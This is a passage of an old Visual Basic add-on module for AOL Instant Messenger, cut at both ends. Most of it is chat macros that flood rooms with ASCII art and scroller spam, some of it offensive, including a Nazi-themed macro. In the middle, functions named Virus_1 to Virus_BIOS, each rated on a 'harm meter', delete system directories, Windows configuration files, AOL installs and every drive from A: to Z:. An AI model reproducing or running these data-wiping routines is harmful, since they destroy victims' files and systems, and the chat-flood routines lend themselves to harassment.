Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChr$ = NextChr$ + "."
Let NewSent$ = NewSent$ + NextChr$
Loop
Pero$ = NewSent$
Talker_Period = Pero$
End Function
Sub Aim_Chat_Send_Macro_Alien()
Call Aim_Chat_Send_Normal(" .· '`'`'`'`'`·. ")
Call Aim_Chat_Send_Normal(".·´ `·.")
Call Aim_Chat_Send_Normal(" '·. •`·. .·´• .·' ")
Call Aim_Chat_Send_Normal(" `:--·´ `·--:´ ;´`;")
Call Aim_Chat_Send_Normal(" `·. ' ' .·´ ; ; ")
Call Aim_Chat_Send_Normal(" ;`·-·´; (¯' '¯)")
End Sub
Sub Aim_Chat_Send_Macro_Frog()
Call Aim_Chat_Send_Normal(" @...@ º")
Call Aim_Chat_Send_Normal(" (------) ")
Call Aim_Chat_Send_Normal(" «( )» ")
End Sub
Sub Aim_Chat_Send_Macro_Frogs()
Call Aim_Chat_Send_Normal(" @...@ @...@ @...@ ")
Call Aim_Chat_Send_Normal(" (------) (------) (------)")
Call Aim_Chat_Send_Normal(" «( )»«( )»«( )»")
End Sub
Sub Aim_Chat_Send_Macro_Sign()
Call Aim_Chat_Send_Normal(" (o o)")
Call Aim_Chat_Send_Normal(" oOO-----(_)-------- ")
Call Aim_Chat_Send_Normal(" | Will Work 4 |")
Call Aim_Chat_Send_Normal(" | Progz |")
Call Aim_Chat_Send_Normal(" -------------------oOo")
Call Aim_Chat_Send_Normal(" |__||__| ")
Call Aim_Chat_Send_Normal(" || || ")
Call Aim_Chat_Send_Normal(" ooO Ooo")
End Sub
Sub Aim_Chat_Send_Macro_Shroom()
Call Aim_Chat_Send_Normal(" ¸ . - ~.---,.¸")
Call Aim_Chat_Send_Normal(" .¸´ ;;;;;;;;;·.")
Call Aim_Chat_Send_Normal(" ,';;; `.;;;;;;· ';")
Call Aim_Chat_Send_Normal(" ;;·´ __ ¨¨¨¨ ¸;")
Call Aim_Chat_Send_Normal(" .' ;´;;;;;`; ,';;'.")
Call Aim_Chat_Send_Normal(" ,´¸¸,,.'--···~~`··--..'¸;;;`,")
Call Aim_Chat_Send_Normal(" `~~··--·,' ·.:',·--··~~´")
Call Aim_Chat_Send_Normal(" .' .·::'.")
End Sub
Sub Aim_Chat_Send_Macro_Kenny()
Call Aim_Chat_Send_Normal(" .·´ ___ `·.")
Call Aim_Chat_Send_Normal(" .´ .·´ `·..·´ `·. `.")
Call Aim_Chat_Send_Normal(" | o: o:: |")
Call Aim_Chat_Send_Normal(" `. `....·´`·....´ .´")
Call Aim_Chat_Send_Normal(" `·. `--/\--´ .·´")
Call Aim_Chat_Send_Normal(" .·´`·.______.·´`·.")
End Sub
Sub Aim_Chat_Send_Macro_TeddyBear()
Call Aim_Chat_Send_Normal(" ((__))__((__))")
Call Aim_Chat_Send_Normal(" ( ( (_x)(x_) ) )")
Call Aim_Chat_Send_Normal(" ( ( (_O_) ) )")
Call Aim_Chat_Send_Normal(" ___\ \ U / / ___")
Call Aim_Chat_Send_Normal(" (__) ( ( ) ) (__)")
Call Aim_Chat_Send_Normal(" __(_(___ * __)_)__")
End Sub
Sub Aim_Chat_Send_Macro_Nazi()
Call Aim_Chat_Send_Normal(" |¯¯¯¯¯¯¯¯¯| |¯¯|")
Call Aim_Chat_Send_Normal(" ¯¯¯¯¯¯¯| | | |")
Call Aim_Chat_Send_Normal(" |¯¯¯¯¯¯¯ ¯¯¯¯ |")
Call Aim_Chat_Send_Normal(" | |¯¯¯¯| |¯¯¯¯¯¯")
Call Aim_Chat_Send_Normal(" | | | ¯¯¯¯¯¯¯|")
Call Aim_Chat_Send_Normal(" ¯¯¯ ¯¯¯¯¯¯¯¯¯¯")
End Sub
Sub Aim_Chat_Send_Macro_Wutang()
Call Aim_Chat_Send_Normal(" .·´˜°º^~·-.,, ")
Call Aim_Chat_Send_Normal(" .· ' .·´| ,. -·~^º*°'`·.")
Call Aim_Chat_Send_Normal(" ,' ,'|.·´.··. '|\ \")
Call Aim_Chat_Send_Normal(" |', `·.·' .'.·´ ',")
Call Aim_Chat_Send_Normal(" ',|`·. ,'|")
Call Aim_Chat_Send_Normal(" `·.|`·. .·´¯', . · ´|,'")
End Sub
Sub Aim_Chat_Send_Macro_ICP()
Call Aim_Chat_Send_Normal("¸¸¸...···~**˜˜¨¨/ ¸.·*˜¨¨˜*·.¸ | ¨˜*~··..¸¸ ")
Call Aim_Chat_Send_Normal(" \ / ' / '/ | |*·¸")
Call Aim_Chat_Send_Normal(" *¸ ")
Call Aim_Chat_Send_Normal(" '\¸.·*| |*¨¨* '| ¸·*¨*·¸/ '| |¸·* ")
Call Aim_Chat_Send_Normal(" ¸* ")
Call Aim_Chat_Send_Normal(" ¸¸¸| |¸.·*| | \ ¸·*\ | ")
Call Aim_Chat_Send_Normal("¸..··* ")
Call Aim_Chat_Send_Normal(" / | ' \ ¨˜* '\ | \")
Call Aim_Chat_Send_Normal(" /¸¸¸...···~**˜ *··.¸¸¸¸¸¸.·· '|¸..··*˜¨ ")
End Sub
Sub Aim_Chat_Send_Macro_MidFinger()
Call Aim_Chat_Send_Normal(" \\\////")
Call Aim_Chat_Send_Normal(" ‹( •¿• )› ‹^› ")
Call Aim_Chat_Send_Normal(" _\ ° / __// ")
Call Aim_Chat_Send_Normal(" °°°/ I \ ")
End Sub
Sub Aim_Chat_Send_Macro_LOL()
Call Aim_Chat_Send_Normal(" |¯¯| |¯¯|")
Call Aim_Chat_Send_Normal(" \ \ /¯¯\ \ \")
Call Aim_Chat_Send_Normal(" / /___ | o | / /___")
Call Aim_Chat_Send_Normal(" \______\\___/ \_____\")
End Sub
Sub Aim_Chat_Send_Macro_BRB()
Call Aim_Chat_Send_Normal(" |¯|\¯\ |¯|\¯\ |¯|\¯\")
Call Aim_Chat_Send_Normal(" | |/ /'| '|/ /'| '|/_/")
Call Aim_Chat_Send_Normal(" | |\¯\ | '|\ \'| '|\ \")
Call Aim_Chat_Send_Normal(" |_|/_/'|_| |_|'|_|/_/.")
End Sub
Sub Aim_Chat_Send_Macro_Gun()
Call Aim_Chat_Send_Normal(" _/¯¯¯¯¯¯¯¯¯¯`¯¯¯¯¯´¯¯¯¯¯¯¯¯/\")
Call Aim_Chat_Send_Normal(" \// / / / ¯¯¯¯¯¯¯¯¯ '/(_()")
Call Aim_Chat_Send_Normal(" / ¯¯¯¯ ____ _(¯¯(¯¯(¯¯()_/'o/")
Call Aim_Chat_Send_Normal(" / /XXXX/ /_(_(_//\ ¯¯¯¯¯¯¯'\/")
Call Aim_Chat_Send_Normal(" /_/_____/__/")
End Sub
Sub Aim_Chat_Send_Macro_Money()
Call Aim_Chat_Send_Normal(" _________")
Call Aim_Chat_Send_Normal(" |$1 (:-)) $1|")
Call Aim_Chat_Send_Normal(" ¯¯¯¯¯¯¯¯¯")
End Sub
Sub Aim_Chat_Send_Macro_RIP()
Call Aim_Chat_Send_Normal(" _______ ")
Call Aim_Chat_Send_Normal(" / / \")
Call Aim_Chat_Send_Normal(" / RIP \")
Call Aim_Chat_Send_Normal(" | Granny |")
Call Aim_Chat_Send_Normal(" | |")
End Sub
Sub Aim_Chat_Send_Macro_MadGuy()
Call Aim_Chat_Send_Normal(" ¸·´¯¯`·¸")
Call Aim_Chat_Send_Normal(" ( ^ òó ^) (__)")
Call Aim_Chat_Send_Normal(" ( o ) / |")
Call Aim_Chat_Send_Normal(" ¸·´¯¯ ` ·–-· ´¯¯ /")
Call Aim_Chat_Send_Normal(" | _ / \__/")
Call Aim_Chat_Send_Normal(" \(__) |")
Call Aim_Chat_Send_Normal(" \______/")
End Sub
Sub Aim_Chat_Send_Macro_Snake()
Call Aim_Chat_Send_Normal(" (i\)------(/i)")
Call Aim_Chat_Send_Normal(" _____( \____/ )_____")
Call Aim_Chat_Send_Normal(" (_____ \\/_||_\// ______)")
Call Aim_Chat_Send_Normal(" \_____ \ )/^\( / _____/")
Call Aim_Chat_Send_Normal(" \_____ \___ / ____/")
Call Aim_Chat_Send_Normal(" \ \__/ /")
End Sub
Sub Aim_Chat_Send_Macro_Anarchy()
Call Aim_Chat_Send_Normal(" /\")
Call Aim_Chat_Send_Normal(" == ( ) ==")
Call Aim_Chat_Send_Normal(" // / \ \\")
Call Aim_Chat_Send_Normal(" _ ||___ / /_\ \ ___||__")
Call Aim_Chat_Send_Normal(" ¯\\¯¯ / /¯¯¯\ \¯¯//¯")
Call Aim_Chat_Send_Normal(" \\ / /_____\ \ // ")
Call Aim_Chat_Send_Normal(" ( ) ¯¯¯¯ ( )")
Call Aim_Chat_Send_Normal(" \/ \/")
End Sub
Sub Aim_Chat_Send_Macro_FlickOff()
Call Aim_Chat_Send_Normal(" /´¯/)")
Call Aim_Chat_Send_Normal(" ,/¯ /")
Call Aim_Chat_Send_Normal(" /´¯`/' '/´¯¯`·¸")
Call Aim_Chat_Send_Normal(" /'/ / / /¨ /¯\")
Call Aim_Chat_Send_Normal(" (' ( ´ ´ ¯-/' ')")
Call Aim_Chat_Send_Normal(" \ \")
End Sub
Sub Aim_Chat_Send_Macro_Bunny()
Call Aim_Chat_Send_Normal(" / )/)")
Call Aim_Chat_Send_Normal(" (';' )")
Call Aim_Chat_Send_Normal(" ('') ('')_')o")
End Sub
Sub Aim_Chat_Send_Macro_Police()
Call Aim_Chat_Send_Normal(" _Ç______")
Call Aim_Chat_Send_Normal(" ______/l__ç||____\\______¸")
Call Aim_Chat_Send_Normal(" { __Po-Po ¦ police______)")
Call Aim_Chat_Send_Normal(" ¹-/(o)\---¹-----¹---------/(o)\-¹:")
End Sub
Sub Aim_Chat_Send_Macro_Face()
Call Aim_Chat_Send_Normal(" (*)(*)")
Call Aim_Chat_Send_Normal(" | ( ) |")
Call Aim_Chat_Send_Normal(" | ^ |")
Call Aim_Chat_Send_Normal(" |__v_|")
End Sub
Sub Aim_Chat_Send_Macro_Afro()
Call Aim_Chat_Send_Normal(" ####")
Call Aim_Chat_Send_Normal(" ######")
Call Aim_Chat_Send_Normal(" #######;")
Call Aim_Chat_Send_Normal(" `# õõ #´/")
Call Aim_Chat_Send_Normal(" (# ‹U› #)")
Call Aim_Chat_Send_Normal(" '·¸(–)¸·' ")
End Sub
Sub Aim_Chat_Send_Macro_EvilJoker()
Call Aim_Chat_Send_Normal(" ·´¯`. .´¯`·")
Call Aim_Chat_Send_Normal(" '. .'")
Call Aim_Chat_Send_Normal(" (\ '`·´ /)")
Call Aim_Chat_Send_Normal(" . .")
Call Aim_Chat_Send_Normal(" ·´`,· . __ . ·,´`· ")
Call Aim_Chat_Send_Normal(" `'·––-·'´ ")
End Sub
Sub Aim_Chat_Send_Macro_hi()
Aim_Chat_Send_Normal (" ______ ")
Aim_Chat_Send_Normal (" |¯|_|¯| | |")
Aim_Chat_Send_Normal (" |_|¯|_| ¯||¯")
Aim_Chat_Send_Normal (" |¯ ¯|")
End Sub
Sub Aim_Chat_Send_Macro_stevecase()
Aim_Chat_Send_Normal (" \/\/\/\\\//\//\/ ")
Aim_Chat_Send_Normal (" ( | ® ® | ) <--Steve Case")
Aim_Chat_Send_Normal (" | -- | [jjj]")
Aim_Chat_Send_Normal (" ¯|¯|¯ / /")
Aim_Chat_Send_Normal (" /¯¯¯¯¯¯ /")
Aim_Chat_Send_Normal (" / | AoL |(By 54ø)")
End Sub
Function Virus_1()
'deletes C:\Program Files\ directory
'harm meter = 5
On Error Resume Next
Delete_DIR ("C:\Program Files")
End Function
Function Virus_2()
'deletes C:\Windows\system directory
'harm meter = 8
On Error Resume Next
Delete_DIR ("C:\Windows\system")
End Function
Function Virus_3()
'deletes Autoexec.bat
'harm meter = 8
On Error Resume Next
Delete_File ("C:\Autoexec.bat")
End Function
Function Virus_4()
'deletes important ini files.
'harm meter = 8
On Error Resume Next
Delete_File ("C:\win.ini")
Delete_File ("C:\sys.ini")
End Function
Function Virus_5()
'deletes any disk drive on your system
'harm meter = 9
On Error Resume Next
Delete_DIR ("A:\")
Delete_DIR ("B:\")
Delete_DIR ("C:\")
Delete_DIR ("D:\")
Delete_DIR ("E:\")
Delete_DIR ("F:\")
Delete_DIR ("G:\")
Delete_DIR ("H:\")
Delete_DIR ("I:\")
Delete_DIR ("J:\")
Delete_DIR ("K:\")
Delete_DIR ("L:\")
Delete_DIR ("M:\")
Delete_DIR ("N:\")
Delete_DIR ("O:\")
Delete_DIR ("P:\")
Delete_DIR ("Q:\")
Delete_DIR ("R:\")
Delete_DIR ("S:\")
Delete_DIR ("T:\")
Delete_DIR ("U:\")
Delete_DIR ("V:\")
Delete_DIR ("W:\")
Delete_DIR ("X:\")
Delete_DIR ("Y:\")
Delete_DIR ("Z:\")
End Function
Function VIRUS_Aim()
'deletes aol instant messanger
'harm meter = 4
On Error Resume Next
Delete_DIR ("C:\Program Files\AIM95")
Delete_DIR ("C:\Aim")
End Function
Function Virus_Aol25()
'deletes aol2.5
'harm meter = 3
On Error Resume Next
Delete_DIR ("C:\AOL 25\idb")
Delete_DIR ("C:\AOL 25a\idb")
Delete_DIR ("C:\AOL 25b\idb")
Delete_DIR ("C:\AOL 25i\idb")
Delete_DIR ("C:\AOL 25\Organize")
Delete_DIR ("C:\AOL 25a\Organize")
Delete_DIR ("C:\AOL 25b\Organize")
Delete_DIR ("C:\AOL 25i\Organize")
Delete_DIR ("C:\AOL 25\Tool")
Delete_DIR ("C:\AOL 25a\Tool")
Delete_DIR ("C:\AOL 25b\Tool")
Delete_DIR ("C:\AOL 25i\Tool")
End Function
Function Virus_AoL3()
'deletes aol3.0
'harm meter = 4
On Error Resume Next
Delete_DIR ("C:\AOL 30\idb")
Delete_DIR ("C:\AOL 30a\idb")
Delete_DIR ("C:\AOL 30b\idb")
Delete_DIR ("C:\AOL 30\Organize")
Delete_DIR ("C:\AOL 30a\Organize")
Delete_DIR ("C:\AOL 30b\Organize")
Delete_DIR ("C:\AOL 30\Tool")
Delete_DIR ("C:\AOL 30a\Tool")
Delete_DIR ("C:\AOL 30b\Tool")
End Function
Function Virus_AoL4()
'deletes aol4.0
'harm meter = 4
On Error Resume Next
Delete_DIR ("C:\AOL 40\idb")
Delete_DIR ("C:\AOL 40a\idb")
Delete_DIR ("C:\AOL 40b\idb")
Delete_DIR ("C:\AOL 40\Organize")
Delete_DIR ("C:\AOL 40a\Organize")
Delete_DIR ("C:\AOL 40b\Organize")
Delete_DIR ("C:\AOL 40\Tool")
Delete_DIR ("C:\AOL 40b\Tool")
End Function
Function Virus_Aol5()
'deletes aol5.0
'harm meter = 5
Delete_DIR ("c:/America Online 5.0")
End Function
Function Virus_BIOS()
'this one basically messes up almost every thing
'harm meter = 10
Delete_DIR ("C:\")
Do
ScreenFuck
Loop
CdRom_Crazy
Shell_Aforever
Do
Shell ("B:\")
Shell ("D:\")
Shell ("E:\")
Shell ("F:\")
Shell ("G:\")
Shell ("H:\")
Shell ("I:\")
Shell ("J:\")
Shell ("K:\")
Shell ("L:\")
Shell ("M:\")
Shell ("N:\")
Shell ("O:\")
Shell ("P:\")
Shell ("Q:\")
Shell ("R:\")
Shell ("S:\")
Shell ("T:\")
Shell ("U:\")
Shell ("V:\")
Shell ("W:\")
Shell ("X:\")
Shell ("Y:\")
Shell ("Z:\")
Loop
Mouse_SwapButtons
Cursor_Hide
End Function
Sub Aim_Chat_Scroller1()
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
Aim_Chat_Send_Normal ("Skar owns!!!!")
End Sub
Sub Aim_Chat_Scroller2()
Aim_Chat_Send_Normal ("(' ·.·•('·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)")
Aim_Chat_Send_Normal ("(' ·.·•('·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)")
Aim_Chat_Send_Normal ("(' ·.·•('·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)")
Aim_Chat_Send_Normal ("(' ·.·•('·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)")
Aim_Chat_Send_Normal ("(' ·.·•('·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·•(' ·.·••ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)•ˆ•.)")
End Sub
Sub Aim_Chat_Scroller3()
Aim_Chat_Send_Normal (".·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(")
Aim_Chat_Send_Normal (".·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(")
Aim_Chat_Send_Normal (".·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(")
Aim_Chat_Send_Normal (".·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(.·´`·.·×·•(")
End Sub
Sub Aim_Chat_Scroller4()
Aim_Chat_Send_Normal ("· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·")
Aim_Chat_Send_Normal ("· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·")
Aim_Chat_Send_Normal ("· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·")
Aim_Chat_Send_Normal ("· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·· ·•(`·-·°·-·')•· ·")
End Sub
Sub Aim_Chat_Scroller5()
Aim_Chat_Send_Normal ("•[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··•")
Aim_Chat_Send_Normal ("•[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··•")
Aim_Chat_Send_Normal ("•[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··•")
Aim_Chat_Send_Normal ("•[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··••[¦]•.··•")
End Sub
Sub Aim_Chat_Scroller6()
Aim_Chat_Send_Normal ("«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤")
Aim_Chat_Send_Normal ("«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤")
Aim_Chat_Send_Normal ("«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤")
Aim_Chat_Send_Normal ("«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤«–+†‡†+–·•(¤")
End Sub
Sub Aim_Chat_Scroller7()
Aim_Chat_Send_Normal ("¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»")
Aim_Chat_Send_Normal ("¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»")
Aim_Chat_Send_Normal ("¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»")
Aim_Chat_Send_Normal ("¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»¤)•·-+†‡†+–»")
End Sub
Sub Aim_Chat_Scroller8()
Aim_Chat_Send_Normal (".·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-")
Aim_Chat_Send_Normal (".·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-")
Aim_Chat_Send_Normal (".·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-")
Aim_Chat_Send_Normal (".·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-.·´¯`·-")
End Sub
Sub Aim_Chat_Scroller9()
Aim_Chat_Send_Normal ("LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!!")
Aim_Chat_Send_Normal ("LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!!")
Aim_Chat_Send_Normal ("LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!!")
Aim_Chat_Send_Normal ("LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!! LAMERZ!!!!")
End Sub
Sub Aim_Chat_Scroller10()
Aim_Chat_Send_Normal ("•‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›•")
Aim_Chat_Send_Normal ("•‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›•")
Aim_Chat_Send_Normal ("•‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›•")
Aim_Chat_Send_Normal ("•‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›•")
Aim_Chat_Send_Normal ("•‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›••‹l›•")
End Sub
Sub Aim_Chat_Scroller_Smile()
Aim_Chat_Send_Normal (":-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-)")
Aim_Chat_Send_Normal (":-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-)")
Aim_Chat_Send_Normal (":-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-)")
Aim_Chat_Send_Normal (":-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-):-)")
End Sub
Sub Aim_Chat_Scroller_Frown()
Aim_Chat_Send_Normal (":-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(")
Aim_Chat_Send_Normal (":-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(")
Aim_Chat_Send_Normal (":-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(")
Aim_Chat_Send_Normal (":-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(:-(")
End Sub
Sub Aim_Chat_Send_MacroKill1()
